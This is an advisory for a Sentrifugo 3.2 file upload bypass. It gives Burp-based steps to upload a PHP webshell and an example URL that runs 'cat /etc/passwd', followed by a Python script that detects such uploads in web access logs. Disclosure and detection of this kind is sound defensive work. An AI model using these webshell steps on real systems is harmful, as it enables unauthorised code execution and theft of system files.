Exploits / Vulnerability Discovered: 2019-08-30
Type: webapps
Platform: php
This exploit / vulnerability, Sentrifugo 3.2 file upload restriction bypass, is for educational purposes only; if you use it, you do so at your own risk!
Multiple file upload restriction bypass vulnerabilities were found in Sentrifugo 3.2. These allow an authenticated user to potentially obtain remote code execution (RCE) via a webshell.
1. Self Service >> My Details >> Documents >> add New Document (/sentrifugo/index.php/mydetails/documents)
2. Turn Burp Intercept On
3. Select webshell with valid extension - ex: shell.php.doc
4. Alter request in the upload...
   Update 'filename' to desired extension. ex: shell.php
   Change content type to 'application/x-httpd-php'
5. With intercept still on, save the document and copy the 'file_new_names' parameter from the new POST request.
6. Append the parameter saved above and visit your new webshell
Ex: http://10.42.1.42/sentrifugo/public/uploads/employeedocs/1565996140_5_shell.php?cmd=cat /etc/passwd
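For defenders, the steps above leave a recognizable trace: a request for a script-typed file inside the employee documents upload directory. The following detection sketch is an added example, not part of the original advisory or of Sentrifugo; it assumes Apache/nginx "combined" access logs, an assumed list of PHP-handled extensions, and constructed sample log lines.

```python
import re
from urllib.parse import urlsplit, unquote

# Upload directory taken from the advisory's example URL.
UPLOAD_PREFIX = "/sentrifugo/public/uploads/employeedocs/"
# Assumed list of extensions the web server hands to PHP; match it to your config.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "pht"}

# Apache/nginx "combined" format: client, timestamp, request line, status.
LINE_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample log lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Aug/2019:10:01:02 +0000] "GET /sentrifugo/public/uploads/employeedocs/1567159200_7_cv.doc HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [30/Aug/2019:10:05:40 +0000] "GET /sentrifugo/public/uploads/employeedocs/1567159500_7_notes.php?cmd=id HTTP/1.1" 200 31 "-" "curl/7.64.0"',
    '198.51.100.7 - - [30/Aug/2019:10:06:11 +0000] "GET /sentrifugo/public/uploads/employeedocs/1567159560_7_a.PHP.doc HTTP/1.1" 404 196 "-" "curl/7.64.0"',
    '192.0.2.10 - - [30/Aug/2019:10:07:00 +0000] "GET /sentrifugo/index.php/mydetails/documents HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

def script_requests(lines):
    """Return one finding per request for a script-typed file in the upload directory."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not a combined-format line
        parts = urlsplit(m["target"])
        path = unquote(parts.path)
        if not path.lower().startswith(UPLOAD_PREFIX):
            continue
        name = path[len(UPLOAD_PREFIX):]
        # Check every dot-separated segment, not just the last one,
        # so double extensions such as x.php.doc are reported too.
        segments = name.lower().split(".")[1:]
        if any(s in SCRIPT_EXTS for s in segments):
            findings.append({
                "client": m["client"], "time": m["ts"], "file": name,
                "status": int(m["status"]), "has_query": bool(parts.query),
            })
    return findings

if __name__ == "__main__":
    for finding in script_requests(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 and a query string deserves immediate review of the named file on disk; the same extension check can be run over the directory listing itself to find files that were uploaded but not yet requested.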